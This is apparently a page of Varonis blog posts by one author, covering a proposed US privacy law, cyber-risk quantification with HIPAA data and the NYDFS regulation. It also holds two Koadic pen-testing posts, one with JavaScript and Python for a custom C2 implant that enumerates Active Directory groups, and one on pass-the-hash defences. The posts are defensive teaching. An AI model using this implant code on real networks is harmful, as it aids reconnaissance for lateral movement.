All posts by Andy Green

GDPR, American-Style: Preview of Proposed Federal US Privacy Law, Part I

GDPR, American-Style: Preview of Proposed Federal US Privacy Law, Part I

The General Data Protection Regulation (GDPR) has, for good reason, received enormous coverage in the business and tech press in 2018. But wait, there’s another seismic privacy shift occurring, and it’s happening here in the US. There is now a very good chance that significant data privacy legislation will come to the US soon. I’ll go out on a limb, and say in 2019. But if not next year, then certainly in 2020.

Yes, we’ll likely see GDPR-lite privacy requirements becoming yet another compliance consideration for US companies in the very near future.

No, hell has not frozen over. In fact, over the years there have been various US data security and privacy laws kicking around Congress. With GDPR becoming a reality, and some well publicized privacy lapses making headlines, Silicon Valley companies decided to back federal privacy legislation, rather than having to deal with separate state initiatives.

In September, AT&T, Google, Amazon, Twitter and Apple, testified in Senate hearings in favor of a federal privacy law, with  each offering their own frameworks. They were essentially calling for a simplified version of GDPR. In short, they agreed to stricter consumer controls over their personal data, including a right to deletion/correction, and explicit opt-in for collection and sharing of consumer data.

Let’s Hit the Law Books

Congress has also gotten busy and started introducing their own newly cooked-up batch of privacy legislation with Senators Blumenthal and Wyden taking the lead. There are other Senators weighing in as well.

So what’s in these proposed laws? Well, Blumenthal’s has not been published, but Wyden’s has a fully-formed privacy bill available on the Senate website.

These are big pieces of legislation — though not nearly as complex as GDPR — so I don’t blame you for not immediately diving in and trying to decipher. However, I’ve generously volunteered to do the heavy-lifting, and have spent a few afternoons looking for the good parts, so to speak. While we won’t know what the final US privacy law will look for at least a few months, I’m betting that some of the key elements of the Wyden bill will make the cut.

In this two-part series, I’ll explain what I think a future US law will look like and come up with some short-term next step that can be addressed by your CSO and CIO, sooner rather than later.

If I had to summarize, I’d say we can expect a far broader definition of personally identifiable information (PII) than what’s in most state laws, stronger consumer rights and protections over this data (opt-in, correct, delete), obligations to analyze data and assess risks, a minimum baseline for data security, and, last but not least, significant fines and other penalties for not following the law.

What won’t be in the coming US privacy law? If I’m reading the tea leaves correctly, there won’t be breach notification rule, like the GDPR has. Not yet anyway.

That’s the big picture view. So let’s get into some of the details and in the spirit of end-of-year prognostications, I’ll add my predictions for what I think will ultimately become part of the privacy law of the land in the US.

1. Personal Information

We’re going to get a more modern version of PII. Period. Wyden’s Consumer Data Protection Act (CDPA) defines personal information as data “that is reasonably linkable to a specific consumer or consumer device.” This is about as encompassing as you get and would include quasi -identifiers — for example, birthdate, zip code, and gender — that I wrote about once upon a time.

On the other hand, the personal information definition in, say, Senator Thune’s proposed data security law is not nearly as abstract and instead lists all the usual identifiers — name, address, account, license. It does call out, though, internet-era identifiers and information – user name, passwords, and bio data.

Keep in mind that even traditional identifiers, such as license numbers, can vary by state, and I won’t even get into financial account numbers. To comply with a federal privacy law, you’ll need sophisticated pattern matching to deal just with legacy identifiers spread out across your file system.

What’s a possible solution to the identifier chaos in terms of legal language? The US does have a hybrid model for PII with the HIPAA law, and its definition of protected health information (PHI). All your health information is technically under HIPAA, but to make it easier for insurers and other covered entities, the government created a loooong list of explicit safe harbor identifiers. In short,  f you protect these 18 identifiers, you’re in compliance.

Prediction: I’ll boldly predict that we won’t see a GDPR-style  definition of personal definition, like what’s Wyden bill, but instead we’ll see a list approach, but one that will include a lot of basic online identifiers – user name, passwords, handles, PINs, etc.—as well as of course the legacy ones. In any case, most companies will have to up their game to track and classify data based on this longer list.

2. Risk Assessments and Compliance Reports

Definition of risk assessment from Wyden’s CDPA.

The Wyden legislation makes risk assessments a centerpiece of its privacy requirements. The law goes into some detail about assessments needing to be made based on a few factors, include data minimization, storage duration, and accessibility. It restricts these assessment, though, to automated decision making – that is algorithms. But the Thune legislation, as just one other example, has more general risk assessment requirements.

Additionally, the proposed Wyden law asks larger companies (above $1 billion revenue)  to produce annual data protection report to show that they have “reasonable cyber security and privacy policies” in place. Of course, risk assessments are a standard part of reasonable data security and privacy programs.

The Wyden law, by the way, also requires the CEO, the chief privacy officer (CPO), and the chief information officer (CIO) to certify the report!

Prediction:  We will see explicit language about risk assessments and data security policies (minimization, access, etc.). We are over the self-policing phase of data privacy and security, and this new law will force US companies to prove that their IT departments are doing what they claim. For a sneak preview of what might be in store, check out the NYDFS Cyber Regulation, which gets into nitty-gritty detiails in terms of security program requirements, including an annual report summarizing these efforts.

We’ll continue in the next post with more of what to expect in next year’s US privacy law. And I’ll provide some ideas for how to get ahead of the curve!

 

CEO vs. CSO Mindsets, Part III: Value at Risk For CSOs

CEO vs. CSO Mindsets, Part III: Value at Risk For CSOs

To convince CEOs and CFOs to invest in data security software, CSOs have to speak their language. As I started describing in the previous post, corporate decision makers spend part of their time envisioning various business scenarios, and assigning a likelihood to each situation. Yeah, the C-level gang is good at poker, and they know all the odds for the business hand they were dealt.

For CSOs to get through to the rest of the C-suite, they’ll need to understand the language of risk and chance. It is expecting too much for upper-level non-IT executive to appreciate, say, operational reports on the results of vulnerability scans or how many bots were blocked per month. It’s definitely helpful for IT, but the C-suite is focused on far more fundamental measures.

They would want to know the answer to the following question: can you tell me what are the chances of a catastrophic breach or cyber event, perhaps costing over $10 million, occuring in the next 10 years? Once CEOs have this number, then they can price various options to offset the risk and keep their business on track.

I suspect most IT departments, except in all but the largest companies where formal catastrophe planning is part of their DNA, would be hard pressed to come up with even rough estimates for this number

In this post, I’ll guide you into doing a back-of-the-envelope calculation to answer this question. The approach is based on the FAIR Institute’s risk analysis model. Their core idea is that you can assign numbers to cyber risk using available data sources — both internal and external. In other words, you don’t have to fly completely blind in the current cyber threat environment.

FAIR (and other approaches as well) effectively break down the cost of a data breach into two components:  the severity or magnitude of a single incident and the frequency at which these cyber events over a given period of time. Simple, right?

The FAIR approach in one picture: loss frequency X loss magnitude = average loss.

If you’re thinking, that you can multiple the separate averages of each —  frequency and  severity — to obtain an average for yearly cyber losses, you’re right (with some qualifications). The advantage of the FAIR model is that it allows you to go as deep as you want, depending on your resources, and you can get more granular information beyond broad averages.

I should add that FAIR is not re-inventing the risk wheel. Instead they’ve systemized techniques used principally by banks and insurance companies who have long had to handle catastrophes, financial crises and natural disasters, and know how much to a set aside for the proverbial rainy day.

Mastering Data Disasters: How Bad Is the Risk?

In the last post, I took two years of HIPAA breach reporting data to derive what I called an exceedance loss curve. That’s a fancy way of saying I know the percentiles (or quantiles in risk-speak) for various cyber costs . For this post, I rearranged the curve to make it a bit more intuitive, and you can stare at the graph below:

We finally have a little more insight into answering the question a CEO of a health insurer might ask: how bad can it get?

Answer: Pretty bad!

The top 10% of healthcare cyber incidents can be very costly, starting at $8 million per attack. Yikes.

It’s also interesting to analyze the “weight” or average cost of the last 10% of this severity curve. As we’ll soon see, this is a power-law-ish Pareto style distribution that I talked about back here.

I did a quick calculation using the HIPAA data: the top 10% (or 90th percentile) of incidents, representing under 30 data points, carries a disproportionate 65% of the total cost of all losses! With heavy-tailed curves, we need to focus on the extremes or tail because that’s where all the oomph is.

If we were to do a more sophisticated analysis along the lines of FAIR, we would then take the above healthcare loss severity distribution and merge with both internal loss data (if available) and a risk profile based on, perhaps, a survey of company infosec experts.

Naturally, it would be very helpful to conduct a data risk assessment to discover how much sensitive data is spread out across your file systems, and their associated permissions. This would be fed into the risk formulas.

There are some math-y methods to combine all this together using various weights, and you can learn more about this in Doug Hubbard’s RSA presentation, or (shameless plug) in his book: How to Measure Anything In Cybersecurity Risk.

Healthcare Incident Rates and the Ultimate Average

For our purposes, let’s take the HIPAA reporting data as a good representation of how bad breach costs can be for our imaginary healthcare insurance company.

Now let’s deal with the next component. For the frequency or ate at which incidents occur, you may want to rely more heavily on your own internal data. There are also external data sets. For example, the Identity Theft Resource Center tracks breach incidents by industry sectors, and their health care numbers can guide you in your guesstimating.

Let’s say, for argument’s sake, that our insurer has has logged one significant cyber incident every four years, for an average rate of “.25 incidents” per year.

Drumroll . ..  I multiply the average incident rate, .25, by the average loss or severity cost of the $4.2 million (from the above curve) to come up with an average annual loss of about $1 million.

This number may be eyebrow-raising to CSOs and CEOs of our hypothetical healthcare company. We are dealing with heavy-tailed data, and while this company may not have experienced a $4 million average for an incident (yet), the average tells how bad it can get. And this can help guide C-levels in deciding how much to spend on security risk mitigation — software, training, etc.

With two parameters, alpha and beta, you can go into the breach cost prediction business.

To go a little deeper,  I used stat software — thank you EasyFit! — for some curve wrangling. I picked a power-law distribution, known as Pareto-2, to fit the data.

Though there are more comfy fits with other heavy-tail distribution in their software, it turns out that this is a very good approximation for the tail, which is really what we’re interested in. And as we’ll soon see, this function will help us more precisely say how bad it can get.

Towards Value at Risk (VaR)

I just took you on a speedy tour through the first level of the FAIR approach. The average number we came up with, known in trade as AAL (average annual loss), is good baseline for understanding cyber risks.

As I suggested above, the CEO and (especially) the CFO want more precise information. This leads to Value at Risk or VaR, a biz-school formula that financiers and bankers use in their risk estimates.

If you’ve ever taken, as I have, “statistics for poets”, you’ll immediately recognize VaR as the 90% or 95% confidence formula for normal curves. Typically, CFOs prefer measuring the 99% level — 2.3 standard deviations from the mean — or the “once in a hundred year” event.

Why?

They are planning for extreme situations! You can think of CFOs grappling with how much to set aside to deal with the equivalent of a cyber tornado or hurricane, and for this, VaR is well suited.

Using my stats software, I came up with a 90% VaR formula — once in 10 year event — for my non-normal heavy-tailed distribution: it calculates a VaR of $8.2 million, which is close to the actual HIPAA data at the 10% mark in the graph above. Good work, EasyFit!

The advantage of having a VaR formula, which I’ll go into more detail next time, is that it enables us to extrapolate: we can answer other questions beyond what the data tells us.

For example: what can I expect in breach costs over a 10 year period assuming on average of, say, three cyber events in that period? I won’t hold you in suspense …  the 90% VaR formula tells us it’s about $19 million, under 3 times the average cost of a single cyber event.

Let’s call it a day.

I’ll go over some of this material again, and tie it all up into a nice package in my next post. And we’ll learn more scary details about evil heavy-tailed breach loss curves.

NYDFS Cybersecurity Regulation in Plain English

nydfs cybersecurity regulation title and logo for

In 2017, the New York State Department of Financial Services (NYDFS) launched GDPR-like cybersecurity regulations for its massive financial industry. Unusual at the state level, this new regulation includes strict requirements for breach reporting and limiting data retention.

Like the GDPR, the New York regulation has rules for basic principles of data security, risk assessments, documentation of security policies, and designating a chief information security officer (CISO) to be responsible for the program.

Unlike the GDPR, the regulation has very specific data security control, including annual pen testing and vulnerability scans!

The point of these rules, as with the GDPR, is to protect sensitive nonpublic information, which is essentially consumer personally identifiable information or PII that can used use to identify an individual.

NYDFS Cybersecurity Regulation Defined

The NYDFS Cybersecurity Regulation (23 NYCRR 500) is “designed to promote the protection of customer information as well as the information technology systems of regulated entities”. This regulation requires each company to conduct a risk assessment and then implement a program with security controls for detecting and responding to cyber events.

Who Does NYDFS Cybersecurity Law Apply to?

list of who the nydfs cybersecurity regulation applies to

The NYDFS has supervisory power over banks, insurance companies, and other financial service companies. More specifically, they supervise the following covered entities:

  • Credit Unions
  • Health Insurers
  • Investment Companies
  • Licensed Lenders
  • Life Insurance Companies
  • Mortgage Brokers
  • Savings and Loans Associations
  • Private Bankers
  • Offices of Foreign Banks
  • Commercial Banks

In short: any institution that needs a license from the NYDFS is covered by this regulation. A more extensive list can be found here.

There are some exemptions for companies that fall under the following categories:

  • Fewer than 10 employees, including any independent contractors, of the Covered Entity or its Affiliates located in New York or responsible for business of the Covered Entity, or
  • Less than $5,000,000 in gross annual revenue in each of the last three fiscal years from New York business operations of the Covered Entity and its Affiliates, or
  • Less than $10,000,000 in year-end total assets, calculated in accordance with generally accepted accounting principles, including assets of all Affiliates, or
  • There’s no storing or processing of nonpublic information.

How Does The NYDFS Cybersecurity Regulation Work?

The NYDFS Cybersecurity Regulation works by enforcing what are really common sense IT security practices. Financial companies in New York that are already rely on existing standards, say PCI DSS or SANS CSC 20, should have little problem meeting the New York regulation.

In short, NYDFS is asking organization to assess their security risks, and then develop policies for data governance, classification, access controls, system monitoring, and incident response and recovery. The regulation calls for companies to implement, at a minimum, specific controls in these areas (see the next section) that are typically part of compliance standards.

The big difference of course is that New York State regulators at the Depart of Financial Services are enforcing these rules, and that not complying with the regulation becomes a legal matter. They are even requiring covered entities to designate a CISO who will annually sign off on the organization’s compliance.

What Are The NYDFS Regulation Requirements?

nydfs cybersecurity regulation requirements

Covered entities will have to implement the following:

  • Risk Assessments – Conducted periodically and will be used to assess “confidentiality, integrity, security and availability of the IT infrastructure and PII. (Section 500.09)
  • Audit Trail – Designed to record and respond to cybersecurity events. The records will have to be maintained for five years. (Section 500.06)
  • Limitations on Data Retention – Develop policies and procedures for the “secure disposal” of PII that is “no longer necessary for business operations or for other legitimate business purposes” (Section 500.13)
  • Access Privileges – Limit access privileges to PII and periodically review those privileges. (Section 500.07)
  • Incident Response Plan – Develop a written plan to document internal processes for responding to cybersecurity events, including communication plans, roles and responsibilities, and necessary remediations of controls as needed. (Section 500.16)
  • Notices to Superintendent – Notifications to the NYFS within at most 72-hours after a “material” cybersecurity event has been detected. (Section 500.17)

NYDFS Cybersecurity FAQs

    1. Do you have to report all cybersecurity events within 72-hours to NYDFS?
      No. You only have to report events that have a “reasonable likelihood of materially harming any material part” of the company’s IT infrastructure. For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.
    2. How frequently do you have to conduct risk assessments?
      Covered entities are supposed to conduct “periodic” assessments. However, keep in mind the CISOs will have to certify annually (see below) that their organization is in compliance. You should expect to do assessments at a minimum once per year.
    3. How much documentation is required beyond developing security policies?
      There’s no escaping the fact that reporting requirements are significant, and CISOs will be busy just handling this new regulation. In addition to reporting material cyber incidents to NYDFS, the CISOs will have to report annually to the board or governing body the current cybersecurity state of the organization, including material cybersecurity risks, effectiveness of controls, and material cybersecurity events. For any weaknesses that are discovered as part of the assessment, CISOs will need to document the remediation efforts that were undertaken. Finally, the CISO will also have to annually certify to the NYDFS that their organization is in compliance.

NYDFS Cybersecurity Regulation Tips for Compliance

There are few important points to keep in mind about the NYDFS regulations:

  • NYSDFS rules on breach reporting cover a far broader type of cyber event than any other state. Not only does the organization have to report stolen information, but also any attempt to gain access or to disrupt or misuse system. This includes denial-of-service (DoS), ransomware, and any kind of post-exploitation where system tools are leveraged and misused. Look for monitoring systems that have the capability to detect unusual access to sensitive data.
  • There are significant training requirement for cyber staff. Companies will have to provide corporate training to “address relevant cybersecurity risks”. And cyber staff are not off the hook either: they are required to take steps to keep professionally current with cybersecurity trends. Financial companies in New York will likely need to up their training budgets to meet these rules.
  • Data classification is a critical first step in performing a risk assessment. A security team will need to determine how much PII is in the organization, where it is located, and who has access to it in order to evaluate potential risk. This information is then used to tune access rights to this sensitive data so that only those who really need data as part of their role have access — and no one else.

How Varonis Can Help

NYDFS Requirement
Section 500.02 Cybersecurity Program. Varonis detects insider threats and cyberattacks by analyzing data, account activity, and user behavior; prevents and limits disaster by locking down sensitive and stale data; and efficiently sustains a secure state with automation.
Section 500.06 Audit Trail. Varonis gives you a single unified platform to manage risk and protect your most important assets, along with built-in reports and a detailed, searchable audit trail of data access.

With a unified audit trail, admins or security analysts are only a few clicks away from knowing who’s been opening, creating, deleting, or modifying important files, sites, Azure Active Directory objects, emails, and more.

Section 500.07 Access Privileges DatAdvantage maps who can access data and who does access data across file and email systems, shows where users have too much access, and then safely automates changes to access control lists and security groups.

DataPrivilege gives business users the power to review and manage permissions, groups, and access certification, while automatically enforcing business rules.

The Automation Engine discovers undetected security gaps and automatically repairs them: fixing hidden security vulnerabilities like inconsistent ACLs and global access to sensitive data.

Section 500.09 Risk Assessment. Varonis Risk Assessments provide a comprehensive report that highlights at-risk sensitive data, flags access control issues, and quantifies risk.  The risk assessment summarizes key findings, exposes data vulnerabilities, provides a detailed explanation of each finding, and includes prioritized remediation recommendations.
Section 500.13 Limitations on Data Retention. Data Transport Engine automatically moves, archives, quarantines, or deletes data based on content type, age, access activity, and more. Migrate data cross-domain or cross-platform, all while keeping permissions intact and even making them better.

Quarantine sensitive and regulated content, discover data to collect for legal hold, identify data to archive and delete, and optimize your existing platforms.

Section 500.14 Training and Monitoring. Varonis continually monitors and alerts on your core data and systems.

Detect unusual file and email activity, suspicious user behavior, and trigger alerts cross-platform to protect your data before it’s too late. Automatic response triggers can stop ransomware in its tracks, and mitigate the impact of compromised accounts and potential data breaches.

Visualize security threats with an intuitive dashboard, investigate security incidents – even track alerts and assign them to team members for closure.

Section 500.16 Incident Response Plan.
Section 500.17 Notices to Superintendent.

NYDFS dictates that risk assessments are not just a good idea, but (at least in New York State) are required for financial companies. Get started with a free risk assessment: we’ll identify PII, flag excessive permissions, and help you prioritize at-risk areas – and take the first steps towards meeting NYDFS compliance.

Koadic: Security Defense in the Age of LoL Malware, Part IV

Koadic: Security Defense in the Age of LoL Malware, Part IV

One of the advantages of examining the gears inside Koadic is that you gain low-level knowledge into how real-world attacks are accomplished. Pen testing tools allow you to explore how hackers move around or pivot once inside a victim’s system, and help you gain insights into effective defensive measures.

Block that Hash Passing

Pass the Hash (PtH) is one approach, not the only, for moving beyond the initial entry point in the targeted system. It’s received lots of intention, so it’s worth looking at more closely.

The key assumption behind PtH is that you already have local administrative privileges, which is required by mimikatz and other hash passers. Koadic conveniently provides mimikatz in one of its  implants.

Is getting admin privileges for PtH an issue for hackers?

Generally not! They hackeratti have found that obtaining local admin privileges is not a major barrier. They’ve been able to take advantage of special exploits, guess default Administrator passwords, or get lucky and land on an account that already has higher privileges.

Koadic, for example, includes a few implants that can raise privilege levels. The one I tried is based on Matt Nelson’s work involving the auto elevation capabilities of the Windows binary, eventvwr.exe, which is, somewhat ironically, the WIndows Event Viewer. Anyway, Microsoft has since come out with a patch for this exploit in Windows 10.

At one point during my initial testing over the summer, Koadic’s bypassuac_eventvw implant seemed to have been working on my Amazon instance. In my last test, it failed, and I’ll assume I got lucky working with an unpatched system in my first go around.

There’s a lesson here: in the wild, not every system is going to be patched, and hackers will hunt around until they find one!

UAC Helps!

Microsoft has written a long and comprehensive white paper on preventing PtH. It’s worth your time to scan through it. However, there’s also been much written by security wonks on what Microsoft has done (or not done) in preventing PtH. And after reading more in-depth analysis, I’m not sure I understand all the subtleties!

In any case, one of Microsoft’s recommendations is User Access Controls, UAC for short, which was a security control added at the time of Vista. It prevents privileged accounts from automatically doing what they want until their actions are approved (on a secure console) by a human. You may have seen the UAC dialog show up on your office laptop when you try to download and execute a binary from the Intertoobz.

You can find the UAC settings in Group Policy Objects under Policies\Windows Settings\Local Polices\Security Options (below). The MS honchos recommend, at a minimum, enabling Admin approval mode. In my testing, I got carried away and liberally enabled a few other UAC options.

With UAC enabled, I was able to stop Koadic from running its mimikatz implant.

I set up a scenario where the Koadic stager is directly launched from a local Administrator account. Even in this obvious case, you eventually have to deal with UAC. You can still run commands remotely from the Koadic console, but if you try to engage in a PtH pivot, you’re blocked (below).  I checked the event log, and sure enough there’s an entry showing the UAC was activated.

Blocked by UAC!

In short: UAC prevents hackers from getting to domain-level credentials and easily hopping from one computer to another.

The Horror of Local Administrator Accounts

One of the root enablers of lateral movement are the local Administrator accounts that once upon a time Windows set up automatically. To make life easier, IT admins have often configured these accounts with the same easily guessable passwords across many machines.

For hackers, that’s like throwing gasoline on the fire: once in, they can effortlessly navigate around the victim’s system without even a PtH. They just run psexec, supplying it explicitly with the Administrator’s password, say admin123.  Easy peasy.

There’s another bad practice of giving some users — often executives — local Administrator privileges on the mistaken belief they need these extra privileges to do special tasks. In other other words, their users accounts are added to the local Administrator group on their laptops.

Lucky hackers that land on one of these machines can then hit the ground running: they already have elevated permissions so they can PtH from the get go.

What are some ideas for lessening the risks with local accounts?

The aforementioned PtH white paper document suggests removing ordinary domain users from the local Administrator group. A good idea, and I approve of this message.

If you do keep local Administrator accounts, then make sure they have high entropy passwords. It can be a major heachache to go back and update bad admin passwords for larger sites. Microsoft generously provides Local Administrator Password Solution (LAPS) and Restricted Groups to allow companies to central manage these accounts. It’s topic I took up in this post.

You could then follow this up by preventing local accounts from logging in remotely. There’s a GPO setting under Policies\Windows Settings\Local Policies\User Rights Assignment called “Deny access to this computer from the network”. By configuring with a local SID, as explained here, you should be able to block any local account from networking.

[Updated]

So even if hackers have gained a privileged local account, we can stop them from moving around with this GPO setting. I’ve not tried this particularly efficient way of stomping out PtH, but I’ll  update this post as soon as I give it a test ride

I did get a chance to try this recent patch, which makes it incredibly convenient to disable local Administrator accounts from networking on a domain level by providing this new SID, “NT AUTHORITY\Local account and member of Administrators group”. You just need enter this loooong string into the deny networking GPO setting:

Stop local admin networking now! There’s a separate GPO, by the way, for disabling remote desktopping.

This is not necessarily a bad idea. Yes, you’ve prevented hackers from networking with, say, psexec, if they happen to guess the local Administrator password correctly. And probably inconveniencing and making some admins more than a little angry along the way.

If you don’t want to inconvenience your own team, and assuming they have a good, hard-to-guess passwords, there’s another possibility. But therein lies a tale, which is covered in this extensive post by the awesome Will “harmj0y” Schroeder. To turn off the token passing that allows the PtH attack to succeed, you have to deal with two regedit settings found under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (below).

With these two regedit settings, you can turn off PtHing. It will stop hackers form dumping admin credentials and re-using them on another machine.

After some trial and error, I think I finally got what harmj0y was saying. In short, you can allow admins to network with their high-entropy, hard-to-guess passwords while stopping hackers from PtHing. l’ll talk more about this in another post.

Closing Thoughts on LoL Defense

Keeping the hackers contained on a single machine is a practical way to reduce risks. Sure they’re inside and still can do some reconnaissance, but at least you’ve contained them.

Koadic shows how hackers can use existing Windows binaries — mshta, rundll32 — to download scripts. But you can turn off this remote script loading capability, and shut down the attack from the start with Windows Firewall!  There’s no reason these binaries should be accessing the Internet, and Firewall let’s you disable their outbound connections.

Finally, Windows 10 will, no doubt, lead us all into a more secure future. Its Windows Defender has powerful malware detection capabilities, and Credential Guard seems to have a more comprehensive solution to dealing with hashes and Kerberos tickets. I’ll take this up in a future post.

 

 

CEO vs. CSO Mindsets, Part II: Breach Risk, Security Investment, and Thinki...

CEO vs. CSO Mindsets, Part II: Breach Risk, Security Investment, and Thinking Like an MBA

In the last post, I brought up the cultural differences between CEOs and CSOs. One group is managing and growing the business, using spreadsheets to game plan various money making scenarios. The other is keeping the IT infrastructure going 24/7, and studying network diagrams while tweaking PowerShell scripts. I think you know which is which.

The point of this series is to bridge the divide between these two different tribes. In this post, I’ll be dispensing advice on how CSOs and CIOs can begin to convince their overlords — CFOS and CEOs — to pay for data security software. And the first step is to get a better understanding of how CEOs do their work.

Instant MBA for CSOs

The cultural problem begins at business school. No doubt there are more than a few CSOs and CIOs with MBAs but most of them are too busy learning about the latest pen testing techniques or studying for their next IT certification.

However, I can save CSOs two years of study and hundreds of thousands of dollars in tuition. I’ve taken a brief tour of a typical MBA syllabus and can boldly say that everything you need to know about higher-business thinking can be distilled in a simple example.

Let’s say, as they do in a typical B-school assignment, you have $500,000 to invest. If you put it all in a savings account, you can earn a risk-free 1% per year or $5000. Or you have a chance to take a stake in some tech startups for $10,000 a pop. In this example, you have a 1 in 20 or 5% chance of cashing in at a later round of startup financing to the tune of $400,000.

Which option is better?

MBA students learn about such higher-concepts as the law of large numbers, and they effortlessly calculate the average return on the above investment. They know in the long run they’ll come out ahead with the startup investments, and in the short run they’ll have to deal with the cruel winds of Fortune (and gambler’s ruin).

So with the 50 investments in startups, you have a 72% chance of yielding two or more startup victories, and cashing out for at least $800,000. On the other hand, you can lose the entire $500,000 investment 28% of the time. But the payouts will ultimately cover the losses and give a profit to boot —  an expected payout of $1 million for a profit of $500,000.

What does this have to do with convincing executives to invest in data protection software?

Let’s say the CEO has a spreadsheet — trust me, she does! — showing revenues and costs projected over the next few years. Of course, she’s assigned various weights or probabilities to different scenarios and calculated an average payout for each.

Here’s the bad news for CIOs and CSOs. While the standard IT reports, charts, and statistics are essential to understanding the companies current security status, they are not useful in themselves to CEOs. You’d get a “so what?” if you showed them a graph of the number of bots probing ports on an hourly basis.

In justifying an investment in new data security software, a CEO wants to know how data security software will bend or shape the projections in the spreadsheets.

To convince the other C-levels and/or the board of directors, the CSO will have to prove that a breach, with some non-trivial probability, can occur that will cause a significant loss involving legal costs, regulatory fines, class action suits, and customer churn. And then explain how the proposed security software will ultimately pay for itself by protecting against these breaches, thereby keeping the business plans on track.

Data Breaches and Risk

This is not a unique problem in business decision making. Some of the ideas and support tools I’ll be discussing below may be new to CIOs, but they can be learned and applied easily for anyone who’s done even the simplest model building.

First, let me give a shout out to the Cyentia Institute and a gold star to the FAIR Institute. You can noodle on these things on your own, as I did, but it helps that FAIR has a systematic methodology to arrive at an analysis that any CEO would be happy to hear out.

For the naysayers who think this is all guesswork and mathiness, there are more real-world datasets available than you might at first think, and the methodologies I’ll be discussing are more accurate than being guided by intuition alone.

FAIR’s approach forces you to delve into two areas: the magnitude or cost of a data breach incident, and the frequency at which these attacks arise. From that you can come up with a reasonable estimate of the average cost of dealing with breaches over a given time period.

Let’s take up the first part, the cost of a breach. Actually, this is not a single number! It’s really a distribution of percentages — say, 10% of breach incidents cost less than 10,000, 15% are $30,000 or less, etc. This distribution of losses goes under the fancy name of exceedance or excess loss probabilities. In the real word, insurance companies produce these distribution charts to work out auto or home policies for their risk pools.

Can you work out an exceedance probability for your own situation?

You may have to do some digging and perhaps basic model building. However, for healthcare breaches in particular, we have an embarrassment of riches thanks to HIPAA!

I was able to take the last two years of HIPAA breach report data and calculate losses based on Jay Jacob’s breach cost regression formula. The loss distribution comes from ranking the costs from smallest to largest and calculating the percentages. My approach is not quite a true excess loss, but we’ll take that up next time.

Loss distribution based on about 300 data points from 2016 – 2018. (Source: HIPAA)

It’s worthwhile to ponder the above, and note how the incidents cluster at the base while the tail has fewer but more enormous incidents: in the tens of millions, with one weighing in at over $100 million dollars. I’m smelling a fat tail!

As a sanity check for my dataset, I calculated the average cost of a health incident to be around $4.2 million. This is in the ballpark of Ponemon’s incident cost numbers — you can check the 2018 report for yourself. I can do more analysis of this curve, but let’s give ourselves a break.

In short, if you’re a hospital or insurer and are hit with a breach, there’s a small chance you’ll really get whomped!

This is exactly the kind of information a hospital CEO would want to know! However, to derive a more practical answer, you’ll need to guesstimate the chances of your organization getting breached in the first place.

We’ll go over some of this again next time, and then try to work out a more complete argument to make to CEOs and boards to support buying data protection software.

If you want a homework assignment, review Evan Wheeler’s informative and strangely calming RSA presentations on cyber risk management. It’s a big subject with lots of variables and unknowns, but Evan breaks the problem into more digestible portions using the FAIR methodology. Bravo, Evan!

Continue reading the next post in "CEO vs. CSO Mindsets"

Koadic: Implants and Pen Testing Wisdom, Part III

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver JavaScript malware implants to the target and then interact with them from the comfort of your console.

Sure there’s a learning curve to understanding the way the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python shell (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you need to code up these two parts. And that’s all you need to know. Not quite. I’ll get into some more details below.

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant to list AD members for a given group. It seemed like something I can do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never coded the JavaScript to access Active Directory, you’ll find oodles of online examples on how to set up a connection to a data source using the ADODB object — for example this tutorial. The trickiest part is fine tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider="ADsDSOObject";
objConnection.Open("Active Directory Provider");
objCommand = new ActiveXObject( "ADODB.Command");


Koadic.work.report("Gathering users ...");
strDom = "<LDAP://"+strDomain+">";
strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users,"+strDomain+"))";  //Koadic replaces ~GROUP~ with info field
strAttributes = "ADsPath";

strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText=strQuery;

objRecordSet = objCommand.Execute();
objRecordSet.Movefirst;
user_str="";
while(!(objRecordSet.EoF)) {

  user_str +=objRecordSet.Fields("ADsPath").value;
  user_str +="\n";
  objRecordSet.MoveNext;
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted from an existing Koadic implant, which I’m calling enum_adusers. You can view a part of my implant below.

import core.implant
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()
    def display(self):
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            save_file = "/tmp/loot."+self.session.ip+"."+uuid.uuid4().hex
            with open(save_file, "w") as f:
              f.write(self.data)
            self.shell.print_good("Saved loot list to "+save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class, in particular the print methods. Under the hood, Koadic is scooping up the data sent by the JavaScript code’s report function, and displaying it to the console.

